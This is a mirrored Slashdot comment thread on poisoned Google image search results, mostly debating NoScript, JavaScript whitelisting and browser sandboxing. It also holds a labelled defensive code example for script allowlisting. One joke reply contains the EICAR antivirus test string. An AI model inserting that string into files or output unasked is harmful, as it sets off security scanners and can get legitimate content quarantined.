Slashdot Mirror


Poisoned Google Image Searches Becoming a Problem

Orome1 writes "If you are a regular user of Google's image search, you might have noticed that poisoned search results have practically become a common occurrence. Google has, of course, noticed this and does its best to mark the offending links as such, but they still have trouble when it comes to cleaning up its image search results."

262 comments

  1. im glad im not the only one by metalmaster · · Score: 4, Informative

    I was looking up images for a VP shunt when I came across a few poisoned links. I got scared for a minute because just hovering over the image triggered the payload for one of them

    1. Re:im glad im not the only one by WrongSizeGlass · · Score: 5, Funny

      To protect myself against these poisoned image search results I make sure I always use Lynx when I search for images.

    2. Re:im glad im not the only one by Anonymous Coward · · Score: 0

      This is where I wish some of those old ASCII penisbird trolls would jump in

    3. Re:im glad im not the only one by Nimey · · Score: 5, Informative

      lynx + zgv was how I used to view images on the Web about ten years ago. It worked surprisingly well, back before AJAX or Flash were used for navigation.

      --
      Hail Eris, full of mischief...

      E pluribus sanguinem
    4. Re:im glad im not the only one by lennier1 · · Score: 3, Interesting
    5. Re:im glad im not the only one by Alex Belits · · Score: 1

      lol penis birds X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

      --
      Contrary to the popular belief, there indeed is no God.
    6. Re:im glad im not the only one by ae1294 · · Score: 1

      I was looking up images for a VP shunt when I came across a few poisoned links. I got scared for a minute because just hovering over the image triggered the payload for one of them

      That's why I've spent years building up a tolerance to poison links...

    7. Re:im glad im not the only one by Rizimar · · Score: 5, Funny

      I'm pretty fluent in JPEG myself, though I read the files in a hex editor. You get used to it. I...I don't even see the code. All I see is blonde, brunette, red-head.

    8. Re:im glad im not the only one by Anonymous Coward · · Score: 5, Funny

      Dread Pirate Google: All right. Where is the trojan? The battle of wits has begun. It ends when you decide and we both click, and find out who is right... and who is hacked.

      Vizzini: But it's so simple. All I have to do is divine from what I know of you: are you the sort of man who would put the trojan into his own link or his enemy's? Now, a clever man would put the trojan into his own link, because he would know that only a great fool would click on what he was given. I am not a great fool, so I can clearly not choose the link in front of you. But you must have known I was not a great fool, you would have counted on it, so I can clearly not choose the link in front of me.

      Dread Pirate Google: You've made your decision then?

      Vizzini: Not remotely. Because Zeus comes from Eastern Europe, as everyone knows, and Eastern Europe is entirely peopled with criminals, and criminals are used to having people not trust them, as you are not trusted by me, so I can clearly not choose the link in front of you.

      Dread Pirate Google: Truly, you have a dizzying intellect.

      Vizzini: Wait till I get going! Where was I?

      Dread Pirate Google: Eastern Europe.

      Vizzini: Yes, Eastern Europe. And you must have suspected I would have known the trojan's origin, so I can clearly not choose the link in front of me.

      Dread Pirate Google: You're just stalling now.

      Vizzini: You'd like to think that, wouldn't you? You've beaten my firewall, which means you're exceptionally strong, so you could've put the trojan in your own link, trusting on your strength to save you, so I can clearly not choose the link in front of you. But, you've also bested my antivirus, which means you must have studied, and in studying you must have learned that root is hackable, so you would have put the trojan as far from yourself as possible, so I can clearly not choose the link in front of me.

      Dread Pirate Google: You're trying to phish me into giving away something. It won't work.

      Vizzini: It has worked! You've given everything away! I know where the trojan is!

      Dread Pirate Google: Then make your choice.

      Vizzini: I will, and I choose-- What in the world can that be?

      Dread Pirate Google: What? Where? I don't see anything.

      Vizzini: Well, I- I could have sworn I saw something. No matter.

      Dread Pirate Google: What's so funny?

      Vizzini: I'll tell you in a minute. First, let's click. Me on my link, and you on yours.

      (They both click.)

      Dread Pirate Google: You guessed wrong.

      Vizzini: You only think I guessed wrong! That's what's so funny! I switched links when your back was turned! Ha ha! You fool! You fell victim to one of the classic blunders! The most famous is never get involved in a land war in Asia, but only slightly less well-known is this: never go in against a Sicilian when pwnage is on the line!! Ha ha ha ha ha ha ha!! Ha ha ha ha ha ha ha!! Ha ha ha--NO CARRIER

    9. Re:im glad im not the only one by Lillebo · · Score: 1

      Conversation inspired by The Princess Bride: http://en.wikipedia.org/wiki/The_Princess_Bride

    10. Re:im glad im not the only one by Anonymous Coward · · Score: 0

      I have to say, google has become more and more worthless in the past 2 years without using advanced search queries.
      Simple searches almost always return 6000000 garbage results, many appearing on the first page of search results.
      There are so many people trying to get rich quick with bullshit websites (the irony, google caused this mess, the sites in question are all competing for adword/adsense pennies) the www has become a huge stinking trash pile.
      I feel bad for those that can't tell the difference or don't know how to do complicated searches that return actual useful results.
      And if one more query returns answers.yahoo.com and that mess of uninformed idiots, I'll I'll I'll stutter and turn off my internet.

    11. Re:im glad im not the only one by Anonymous Coward · · Score: 0

      Bravo, Lillebo. Bravo. Please let me know what movie "What is the air-speed velocity of an unladen swallow?" comes from. I'm also curious about "No, I am your father", "Frankly, my dear, I don't give a damn" and who the fuck said "You've got to ask yourself a question: Do I feel lucky? Well, do ya, PUNK?".

    12. Re:im glad im not the only one by perryizgr8 · · Score: 2

      what does poisoned even mean here?

      --
      Wealth is the gift that keeps on giving.
    13. Re:im glad im not the only one by Anonymous Coward · · Score: 0

      *slow clap*

    14. Re:im glad im not the only one by geminidomino · · Score: 1

      Oh gods, I should NOT be laughing that hard at 3 AM...

      That was great.

    15. Re:im glad im not the only one by Lost Race · · Score: 1

      Good question. And what does "triggered the payload" mean?

    16. Re:im glad im not the only one by MMMDI · · Score: 1

      Even better question. And what is this "Google" they are speaking of?

    17. Re:im glad im not the only one by jimicus · · Score: 2

      Click on the link and abracadabra, as if by magic your computer is infected with malware.

      I had one yesterday through stumbleupon - it showed a webpage claiming to scan for (and naturally find) malware and at the same time triggered the download of something calling itself anti_malware.zip. I don't know if it would have exploited a browser hole to install itself had I been running Windows or if it was simply banking on me running the download.

    18. Re:im glad im not the only one by hairyfeet · · Score: 1

      So NoScript FTW then? Has anybody come up with a NoScript style tool for Chromium BTW? Because on the one hand with FF devs refusing to support low rights mode in modern Windows it makes FF worse than Chromium, but on the other hand having NoScript makes it safer to actually have a readable page without the "all or nothing" approach of other browsers.

      So I guess what I'm trying to figure out is this: Is it safer to run Chromium in low rights mode, or to have FF running in full rights but have NoScript? If anyone here has a clue please chime in, as I don't have any spare boxes capable of running Win 7 ATM so I have no way to really test the theory. It would be interesting to know which is safer: FF with NoScript or Chromium low rights mode and sandboxing.

      Although if they don't fix the damned memory leaks and CPU spikes I'll have to switch everyone over to Comodo Dragon (Chromium based) anyway as I'm already running into customers that are having trouble with FF 4. But if anybody knows which sitch is the safer way to go please let me know. Anything that can give my customers and family a safer machine is always of the good.

      --
      ACs don't waste your time replying, your posts are never seen by me.
    19. Re:im glad im not the only one by Anonymous Coward · · Score: 1

      For now I will go with Chrome in low rights (Vista or Win 7). I don't know about Chromium as I only run the Google Chrome distribution, but I would guess they are the same. As you are probably aware, most exploits lately use some Flash vulnerability or Adobe Reader vulnerability. These are mitigated by the low rights (protected mode).

    20. Re:im glad im not the only one by Anonymous Coward · · Score: 2, Funny

      I myself have spent many years building up an immunity to these poisons.

    21. Re:im glad im not the only one by Mana Mana · · Score: 1

      > lynx + zgv was how I used to view images on the Web

      ^ For pussies. telnet is for men.

    22. Re:im glad im not the only one by Methuseus · · Score: 1

      Well, I don't know which movie the last one is from. I believe it's a Clint Eastwood (or whatever the fuck his name is) movie, but dunno which one. Don't even know the names of any. I can't stand to watch any of them to be honest.

      --
      Two things are infinite: the universe and human stupidity, though I'm not yet sure about the universe. - A Einstein
    23. Re:im glad im not the only one by Anonymous Coward · · Score: 0

      "Poisoned" means instead of hot naked chicks, you get hot naked trannies.

      "Triggered the payload" means you fapped and came anyway,

      HTH.

    24. Re:im glad im not the only one by jgagnon · · Score: 1

      Bah. Saving multiple messages from Usenet, concatenating them, and then using uudecode FTW. :p

      --
      Remember to maintain your supply of /facepalm oil to prevent chafing.
  2. web 101: don't run unknown javascripts by Anonymous Coward · · Score: 4, Insightful

    From TFA: "it displays another script - this time it's a JavaScript one - that redirects the browser to another compromised site that serves malware."

    By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. Most people seem to just run any old javascripts by default, without having the first clue what it might be doing. There can't be much debate that it's a stupid course of action, given how many people's machines are jacked by exactly that attack vector (albeit possibly using another as well).

    Yeah, yeah, I know, you need javascript for your bank. That's great: whitelist your damn bank. But run only javascripts on your *whitelist*, not any thing any random yahoo from a site you've never heard of before wants you to run. Would you treat your physical possessions that way? Would you let a drug gang in eastern europe borrow your car with your permission? If not, why would you allow them to use your computer?

    I swear that the reason I haven't had a malware in my entire PC using history, and others seem to have them on a weekly or monthly basis, is because I don't completely shut off my brain once the words "... on the computer" appear in a sentence.

    1. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      "Most people seem to just run any old javascripts by default"

      Maybe it's because Javascripts run by default, and most people use default settings for everything. My grandma isn't zer0cool.

    2. Re:web 101: don't run unknown javascripts by Frosty Piss · · Score: 4, Insightful

      By 2011, it should be considered "web 101" to not run javascripts unless you have a reason TO run them. Most people seem to just run any old javascripts by default...

      This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

      The *average non-techie web surfer* is simply NOT going to turn off JS.

      Will not happen... So, it's not realistic or productive to waste time discussing such an option.

      Sad, but true.

      --
      If you want news from today, you have to come back tomorrow.
    3. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      I see the point, but I'm not so sure I see it like that. I keep JS off by default, only whitelisting a few sites (and not all their XSS stuff), and everything is basically OK as far as I can tell. Have I seen a few things break? Yeah, but usually not anything I cared much about - just random domains that for all I know really were trying to serve malware. The major sites I use either work fine with no JS at all, or only need one or two to run. JS is not as indispensable as people think. 95% of what it appears to be used for is just to track your ass, and who needs that? I'd put it at about: 95%: tracking your ass. 4%: real stuff. 1%: serving malware.

      Plus, if people started doing this en masse (or browser vendors set the default that way), there would be considerable pressure on sites to work OK without all that shit.

    4. Re:web 101: don't run unknown javascripts by blindseer · · Score: 5, Insightful

      It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

      --
      I am armed because I am free. I am free because I am armed.
    5. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      So this argues that the default is backwards, not that the GP's point is wrong.

    6. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      "there should not be anything a Javascript can do that is harmful to your computer."

      You are probably correct, but since that is not the present state of affairs, the best way to deal with the actual reality appears to be not running JS by default. At such time that your wish becomes reality, one can re-evaluate. For now, wishing a thing true does not make it so. Sticking one's head in the sand about it only makes that person vulnerable.

      The difference between a victim and a non-victim is often not who was targeted, but who took steps to avoid being that victim. It doesn't absolve the attackers of responsibility, it just means that it's stupid to walk down a dark alley in a run down neighbourhood flashing the bling and carrying a wallet with $1000 in it.

    7. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 2, Informative

      As a professional web developer, we often write code that expects Javascript to work on our sites, because no one ever turns it off. We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

    8. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 5, Informative

      This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

      Ironic, given that Google recently (this month) just changed its behavior to practically require Javashit.

      Old hotness: (1) Google "foo". (2) Click "Images" tab at top of screen for a GIS for "foo".

      New and busted: (1) Google "foo". (2) Click "Images" tab at top of screen for... "Your search - foo - did not match any documents." (3) curse, click "Images" tab again - to go to http://www.google.com/imghp?hl=en&tab=ii, and (4) have to type "foo" again in order to GIS "foo". (Or remember to start at images.google.com, which is an issue when you might not be sure which terms to use when searching for the image in the first place)

      Turn Javashit on, and clicking the tab works just fine... but whatever Google changed broke the non-Javashit version of GIS.

      Sorta like last month - maps.google.com is an AJAX app, so it's reasonable for it to require Javascript. But it used to work fine without cookies enabled. Now, it requires both Javascript and cookies. Interesting.

      Just tested/confirmed both of these on Firefox 3.6.16.

      What Facebook does overtly, Google does by benign neglect and failure to regression-test. What's next? Google services simply stop working for Firefox and require Chrome?

    9. Re:web 101: don't run unknown javascripts by makubesu · · Score: 1

      Only run javascript on approved sites? I've tried this before, and to be honest it makes using the internet a pain. Instead, I prefer to, oh you know, not run an operating system that is susceptible to malware attacks.

    10. Re:web 101: don't run unknown javascripts by WuphonsReach · · Score: 1

      This is not going to happen. Many major websites, many of the highest traffic websites involve hundreds of JS scripts to make a single page function. Web 2.0 and all...

      The *average non-techie web surfer* is simply NOT going to turn off JS.


      They will after their machine has to be taken into the shop again for maintenance due to being infected by drive-by exploits like this.

      I've converted quite a few non-technical users over to using Firefox + FlashBlock + NoScript over the past few years. The result is that they whitelist the handful of sites that they care about, temporary whitelist for sites that are a one-time visit, and everything else stays blocked.

      It's not a perfect solution, but the result for them is none of them have been infected since they switched. Cuts their risk factor by probably at least one or two orders of magnitude. Combine that with not letting them run as an admin user on XP, and even if the machine is infected, odds are 10:1 that it will only manage to infect the user's profile instead of the entire machine.

      --
      Wolde you bothe eate your cake, and have your cake?
    11. Re:web 101: don't run unknown javascripts by AsmordeanX · · Score: 4, Insightful

      I tried running with Javascript disabled. Five years ago you could get away with it. Now so many sites, especially with jQuery being so pervasive, simply don't work with JS disabled or you get an ugly broken thing.

      I hear the claim, "Well you can run it on trusted sites". What has the site done to earn my trust? Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked. Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

    12. Re:web 101: don't run unknown javascripts by Low Ranked Craig · · Score: 3, Insightful

      Uh, no. Javascript is required for a significant portion, I'd say most, of the high traffic sites out there. It is simply not feasible, or acceptable to suggest that all users disable a significant portion of the functionality of the web.

      --
      I still cannot find the droids I am looking for...
    13. Re:web 101: don't run unknown javascripts by Low Ranked Craig · · Score: 2

      Why sad? The ability to have portions of the page refresh without round-tripping to the server for a whole new page is only one of the highly useful functions provided by JS.

      --
      I still cannot find the droids I am looking for...
    14. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      It is reality. Virtually all known (persistent) drive-by 'malware' infections are stopped either by plugin disabling or at the sandbox boundaries.

    15. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 2, Informative

      Firefox + FlashBlock + NoScript

      What's the point? NoScript is FlashBlock and then some.

    16. Re:web 101: don't run unknown javascripts by Frosty Piss · · Score: 4, Insightful

      They will after their machine has to be taken into the shop again for maintenance due to being infected by drive-by exploits like this.

      You might think, but there is a lot to suggest that what you suppose is not the case.

      The fact is, the average non-techie user values "interactive" over "secure". Those in the business of servicing PCs on the consumer level will tell you this.

      --
      If you want news from today, you have to come back tomorrow.
    17. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      > Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked

      The word was trusted, not "interesting".

      My bank = trusted.
      Random thing linked to from fark: interesting, but not trusted

      Whitelist only trusted things. If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

    18. Re:web 101: don't run unknown javascripts by Nyder · · Score: 1, Offtopic

      It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

      It's 2011, where's my damn flying car?

      --
      Be seeing you...
    19. Re:web 101: don't run unknown javascripts by Culture20 · · Score: 2

      Even if the defaults are reversed, what is grandma going to do, vet the JS code for every script that wants to run?

    20. Re:web 101: don't run unknown javascripts by Tacvek · · Score: 3, Informative

      The trouble is that you likely get a substantially degraded experience on some sites. Many well developed sites use AJAX to speed up navigation[1], falling back on a full request when JavaScript is disabled. Similarly many sites implement convenience features like jquery-based auto-completion which help make the site easier/faster to use, but again the site continues to function even with JavaScript turned off. You likely never even realize that you are getting a degraded experience because the site did not completely break.

      That is a large part of the reason I actively do not recommend NoScript or similar solutions, favoring blacklisting known bothersome scripts, and using sandboxes and equivalent to guard against the unknown.

      [1] You only need to download the changed portion, and browsers can update a page in place faster than re-rendering the whole page.

      --
      Stylish sheet to fix many problems in Slashdot's D3: https://gist.github.com/801524
    21. Re:web 101: don't run unknown javascripts by 93 Escort Wagon · · Score: 4

      Even if the defaults are reversed, what is grandma going to do, vet the JS code for every script that wants to run?

      This is Slashdot - our posts are meant to demonstrate how 1337 we are, not an understanding of how the world actually works.

      --
      #DeleteChrome
    22. Re:web 101: don't run unknown javascripts by 93 Escort Wagon · · Score: 5, Funny

      It's 2011, there should not be anything a Javascript can do that is harmful to your computer.

      It's 2011, where's my damn flying car?

      It's held up in pre-production until they can fix a persistent Javascript bug.

      --
      #DeleteChrome
    23. Re:web 101: don't run unknown javascripts by Undead Waffle · · Score: 3, Insightful

      Why sad? The ability to have portions of the page refresh without round-tripping to the server for a whole new page is only one of the highly useful functions provided by JS.

      It's useful when used correctly. But when all of the links are JS and I can no longer middle click to open in new window I get annoyed.

    24. Re:web 101: don't run unknown javascripts by Culture20 · · Score: 0, Flamebait

      As a professional web developer, we often write code that expects Javascript to work on our sites

      You're the kind of stupid that makes a website that's just one big flash object with no links to non-flash content. As much as I hate to hate on them, Toys for Bob has been the same kind of stupid for almost a decade, so at least you're in good company.

    25. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      You haven't looked very hard then. It may not be a huge number of people blocking it, but we do exist. Perhaps people get disgusted with your page which depends on java that they go elsewhere.

      It may not be a huge deal now but eventually enough people will block by default that it will affect your page views, and then you'll be redesigning your page to allow for no java. Have fun doing your job twice asshole.

    26. Re:web 101: don't run unknown javascripts by 0123456 · · Score: 2

      We have some very high traffic sites, and outside of web crawlers, I don't believe we've seen it blocked, ever.

      NoScript claims to have downloaded 84,000,000 times, so I can only presume that people running it are unlikely to visit your sites.

    27. Re:web 101: don't run unknown javascripts by 0123456 · · Score: 1

      It's useful when used correctly. But when all of the links are JS and I can no longer middle click to open in new window I get annoyed.

      And I really hate sites which break the back button because the site is all Javashit. Hotmail is a glaring example.

    28. Re:web 101: don't run unknown javascripts by 0123456 · · Score: 1

      If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

      Sadly, I don't think you know 'most people'.

    29. Re:web 101: don't run unknown javascripts by Frosty Piss · · Score: 1

      the best way to deal with the actual reality appears to be not running JS by default

      And Homer Simpson once said...

      ...I'm the magical man, from Happy Land, who lives in a gumdrop house on Lolly Pop Lane!!!!

      Frankly, those who take your view might as well simply run Lynx. Or skip surfing the web.

      --
      If you want news from today, you have to come back tomorrow.
    30. Re:web 101: don't run unknown javascripts by RobbieThe1st · · Score: 2

      Course, near as I can tell, computers these days can re-render the page fast enough that it doesn't matter: It's internet connection speed and latency that's important.
      I, for one, hate ajax crap: It's almost always slower for me (due to them always using multiple requests, across multiple servers usually) than a single, straight HTML page with everything else being cached. Of course, the ajax'd page loading new ad-code may have something to do with it -- Turning on NoScript speeds up some pages loading by 10x at least!

    31. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      Hopefully someone will mod you TROLL. Or MORON.

    32. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 2, Interesting

      You can fix this by adding "&gbv=1" to your search string. If you want it as a search plugin save http://pastebin.com/GswQX4V5 as an xml file in your searchplugins folder.

    33. Re:web 101: don't run unknown javascripts by Culture20 · · Score: 2

      Hopefully someone will mod you TROLL. Or MORON.

      Why? Have I been Wooshed? I had to inform our own web devs that our website doesn't work without flash and JS, and they didn't see the problem either. It's as bad as a sysadmin suggesting RAID0 because he's never seen a drive die. Maybe troll for the TFB comment? I notified them of their error in 2002 when they changed to the big flash object (back when few people used flash), now that flash is being blocked in companies and iP[od/ad/hone]s don't have flash, it still boggles me why they don't have at least a simple "here's who we are" that's just simple html.

    34. Re:web 101: don't run unknown javascripts by jabberw0k · · Score: 3, Insightful

      Indeed. This whole article confuses me. I have been doing web development since the 1990s and the whole point of Javascript was that it cannot cause a program to be run or installed on your computer... otherwise the web browser is insecure. If Javascript code can permit code to run on your computer, that would be a show-stopping browser bug! If that is true, then the only way to prevent this is to stop using that broken browser entirely. But that cannot be the case, can it?

      I find it hard to understand why this whole article is a problem...

    35. Re:web 101: don't run unknown javascripts by brentrad · · Score: 1

      Tried just what you suggested in Google Image Search (in Firefox 4.0.1). Javascript blocked with NoScript: worked. Javascript not blocked: worked. Might want to check it again, or upgrade to 4.0.

    36. Re:web 101: don't run unknown javascripts by interkin3tic · · Score: 1

      Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

      But your whitelisted sites -should- have a decreased chance of being compromised and infected. Thus it is safer than allowing everything, and more functional than blocking everything.

      Honestly I can't understand people who act as if NoScript is a huge security risk or the devil when most people, including myself, would choose "allow all javascripts" if their only options were all or nothing.

    37. Re:web 101: don't run unknown javascripts by brentrad · · Score: 1

      I run with NoScript all the time, it's not really a problem if you're a geek. You need to make a judgement about the site you are visiting. Does it look a little sketchy, and was it just some joke link someone sent me? It stays blacklisted, and if the site doesn't work, well then I'll live without viewing it. Is it the front page of the New York Times? Well you can probably safely whitelist the main domain - if the page still doesn't work, whitelist each domain selectively until the page works - but don't whitelist anything that looks like it's from a web advertising company. It's not really that difficult, and it's been ages since I've gotten a virus, even though I visit many sketchy-looking sites. An added bonus is I never see those highly-annoying javascript ads that pop up off your screen or are animated.

      That said, I don't enable NoScript on my wife's computer. She's not that geeky, and it would piss her off to have to whitelist every single site (she also doesn't have a whole lot of patience.) Just make sure they have a good virus and malware realtime scanner (Microsoft Security Essentials is a good, lightweight, free one), and most importantly have them run Firefox, and they'll be fine.
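
Added example (not part of any post in this thread, and not NoScript's own code): a simplified model of the default-deny allowlisting workflow described in the comments by WuphonsReach and brentrad above, showing which scripts on a page would run. The `ScriptPolicy` class, the rule that an entry covers a host and its subdomains, and every host name are assumptions constructed for illustration.

```javascript
// Simplified model of default-deny script allowlisting (assumption: an entry
// covers the named host and its subdomains). Not NoScript's real code.
class ScriptPolicy {
  constructor(permanent = []) {
    this.permanent = new Set(permanent.map(h => ScriptPolicy.normalize(h)));
    this.temporary = new Set(); // one-time visits; dropped at session end
  }

  static normalize(host) {
    return host.toLowerCase().replace(/\.$/, "");
  }

  // "news.example" covers news.example and cdn.news.example, but not
  // news.example.redirector.test or fakenews.example.
  static covers(entry, host) {
    return host === entry || host.endsWith("." + entry);
  }

  allowTemporarily(host) { this.temporary.add(ScriptPolicy.normalize(host)); }
  endSession() { this.temporary.clear(); }

  hostAllowed(host) {
    const h = ScriptPolicy.normalize(host);
    return [...this.permanent, ...this.temporary]
      .some(entry => ScriptPolicy.covers(entry, h));
  }

  // src === null means an inline <script>, which runs as the page's origin.
  decide(pageUrl, src) {
    const page = new URL(pageUrl);
    let target;
    try {
      target = src === null ? page : new URL(src, page);
    } catch {
      return { src, host: null, allowed: false }; // unparsable: deny
    }
    if (target.protocol !== "http:" && target.protocol !== "https:") {
      return { src, host: null, allowed: false }; // data:, javascript:, ...
    }
    const host = target.hostname;
    return { src, host, allowed: this.hostAllowed(host) };
  }

  evaluatePage(pageUrl, scripts) {
    return scripts.map(src => this.decide(pageUrl, src));
  }
}

// Constructed sample: one allowlisted site and the scripts its page references.
const demoPolicy = new ScriptPolicy(["news.example"]);
const demoScripts = [
  "/static/site.js",                            // same site
  "https://cdn.news.example/lib.js",            // subdomain of allowlisted site
  "https://ads.tracker.test/ad.js",             // third-party ad host
  "https://news.example.redirector.test/go.js", // lookalike host name
  null,                                         // inline script
];
for (const d of demoPolicy.evaluatePage("https://news.example/article", demoScripts)) {
  const label = d.src === null ? "(inline)" : d.src;
  console.log(d.allowed ? "RUN  " : "BLOCK", d.host, label);
}

// A page never seen before, reached from a search result: its inline
// redirect script does not run because the host is not on any list.
console.log(demoPolicy.decide("https://image-host.test/pic.html", null));
```

The inline script on the allowlisted page still runs, which is the limitation AsmordeanX raises: an allowlist does nothing about script served by a trusted site that has itself been compromised.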

    38. Re:web 101: don't run unknown javascripts by toygeek · · Score: 2

      Yes, I will tell you this. Indeed, people want their computer to be like a microwave. They don't care how it works and as long as it puts out hot food they're happy. I still get people running IE6 and 7 and Firefox 2.0. They don't give a hoot about security, and most of the time they have no idea what is secure and what isn't.

      Drive by's are unavoidable, but with some education we help our customers keep from being infected.

    39. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      Whitelist only trusted things. If it means you don't see some dancing walrus but your machine doesn't end up with a keylogger sending your bank password to Nigeria, that's probably an OK tradeoff for most people.

      Where's teh dancing walrus? I the googled it on the internets, but all i gots wen I enterd my Pin wuz nuthin.

    40. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 1

      outside of web crawlers, I don't believe we've seen it blocked

      And inside of a web crawler, it's too dark to read.

    41. Re:web 101: don't run unknown javascripts by Scarletdown · · Score: 1

      Make use of Firefox's Prefbar. That has simple check boxes that you can click on when you need Javascript and Flash enabled. Otherwise, keep them turned off until needed.

      --
      This space unintentionally left blank.
    42. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      I'm more interested in whether or not your grandmother might be Acid Burn.

    43. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      ... or take other protections.

      I have javascript fully enabled. I also have AVG link-scanner fully enabled.

      I did an image search on Google on the 2nd, and got no problems.

    44. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      NoScript, the tin foil hat of 2010

      seriously, there are a ton of better ways of avoiding drive-by attacks by websites that are not shooting in your own browser foot.

    45. Re:web 101: don't run unknown javascripts by houghi · · Score: 1

      The reason this is not the case is because the current ITers are the past script kiddies who LOVED to help out the neighbor and reinstall stuff. So WE trained the people that this was normal.

      Ask a non-tech user and he will say it is normal that PCs get slower over time. "Normal" means here "To be expected".

      I doubt many people say "I work in IT and will charge you the official amount I charge others, grandma." I do so by saying they should ask for support with their supplier. I then explain I offered the installation of Linux and if they are willing to do that, I will be their supplier and they can come to me.

      --
      Don't fight for your country, if your country does not fight for you.
    46. Re:web 101: don't run unknown javascripts by houghi · · Score: 1

      So if I want to search images with Google, should I turn it off or on? Should Google be on my whitelist or not?

      --
      Don't fight for your country, if your country does not fight for you.
    47. Re:web 101: don't run unknown javascripts by jschottm · · Score: 1

      First, flaws in the javascript engine are very often the source of buffer overflow attacks on the web browsers themselves. Perusing the security notes attached to changelogs would show you this.

      Second, even within the allowed scope of the javascript specs, there's a *whole* lot of possibilities. Check out BeEF.

      And third, and perhaps most important, once an attacker can run javascript on a system, they can find plug-ins and feed them content, and with as many of them out there as there are, chances are that the vast majority of users have at least one exploitable plug-in. It's generally not javascript itself that's the method of exploitation, just the handy way of finding and breaking something else.

    48. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 2, Insightful

      The trouble is that you likely get a substantially degraded experience on some sites.

      Ironically I consider all that AJAX-javascript-navigation stuff complete and utter bullshit. That right there degrades experience, not the other way around.

      Before Javascript you could navigate sites in a "standardised" way, i.e. open links in tabs, use back and forward buttons and so on. All sites worked the same. Javascript broke that. Now sites have to reimplement this functionality in their own unusual way; most just don't do it. So navigation gets a lot harder WITH your fancy javascript.

      I get it, as a developer you love fancy new technology. However as a visitor/customer it's a usability nightmare.

    49. Re:web 101: don't run unknown javascripts by houghi · · Score: 1

      For Google Images, I now need to scroll all the way down, select to switch to basic version to get a somewhat usable way of viewing images.

      And even though it would save time and bandwidth on my side and about 5 minutes on their side to put it in a cookie, they decide that I must see it with a shitload of, well shit.

      So now I am using Yahoo and as a result I use it for 'normal' searches as well.

      --
      Don't fight for your country, if your country does not fight for you.
    50. Re:web 101: don't run unknown javascripts by Anonymous Coward · · Score: 0

      What has the site done to earn my trust? Why couldn't a malicious site appear interesting enough to prompt you to turn JS on and thus be attacked. Only a little social engineering can defeat NoScript. Whitelisted sites can become compromised as well.

      Trust is earned. It's a white list, not a black list - the purpose is not to keep it on and go, "AMG THIS SITE IS ANNOYING! OFF JS!" Your risk model is screwed if you can't figure out which sites to white list. "It's my bank. Should I trust them?" By that token, you should never go outside. Falling stuff and all.

    51. Re:web 101: don't run unknown javascripts by mr_lizard13 · · Score: 1

      Most people seem to just run any old javascripts by default, without having the first clue what it might be doing.

      Most people don't, and never will, understand what JavaScript even is. They're not stupid people, they're just ordinary people.

      --
      "We live in a global world" - Harvey Pitt, former Securities and Exchange Commission Chairman
    52. Re:web 101: don't run unknown javascripts by mikael_j · · Score: 2

      If the head honchos say "we talked to marketing, they want widget foo to do thing bar when the user hovers his mouse pointer over it" then most of the time the devs can choose between "just do it" even if it means breaking things for those who don't have JS activated or disciplinary action.

      It basically boils down to "It's not your website, it's ours, and we want shiny javascript everywhere, now implement it!". And yeah, I'm not a big fan of using JS unless absolutely necessary to get the desired results, but sometimes you have to.

      --
      Greylisting is to SMTP as NAT is to IPv4
    53. Re:web 101: don't run unknown javascripts by mikael_j · · Score: 1

      How are those 84 million downloads counted? If they count upgrades then my netbook alone is probably responsible for about a dozen of them (I have two different Firefox setups on it, one "regular" and one that's locked down and running NoScript, AdBlock+ and a couple of other add-ons)...

      --
      Greylisting is to SMTP as NAT is to IPv4
    54. Re:web 101: don't run unknown javascripts by meatron · · Score: 1

      Mind to elaborate which? Myself, I use mainly opera with java disabled by default and enable it only on sites I need. But what are the alternatives for noscript on ff?

    55. Re:web 101: don't run unknown javascripts by Waccoon · · Score: 3, Insightful

      Because browsers allow 3rd party Javascript to run as if it were 1st party. This makes advertisers happy.

      I've been complaining about this for years, but so long as the new economy demands that browsers be supported through sponsorships and ads, security just won't become a priority.

      Hell, reading a PDF can infect your PC with a virus? I've got a great idea... let's build a PDF reader right into the web browser, and for bonus points, you can't disable it. It's okay, we built a sandbox for it, and made JavaScript twice as fast for good measure. Oh, but we still won't include support for [insert FOSS codec of choice here] because it will make the browser too bloated.

    56. Re:web 101: don't run unknown javascripts by jimicus · · Score: 2

      Because the very act of surfing the web is - from a security perspective - probably one of the most stupid things to have happened in the whole of computer history.

      And I'm not exaggerating.

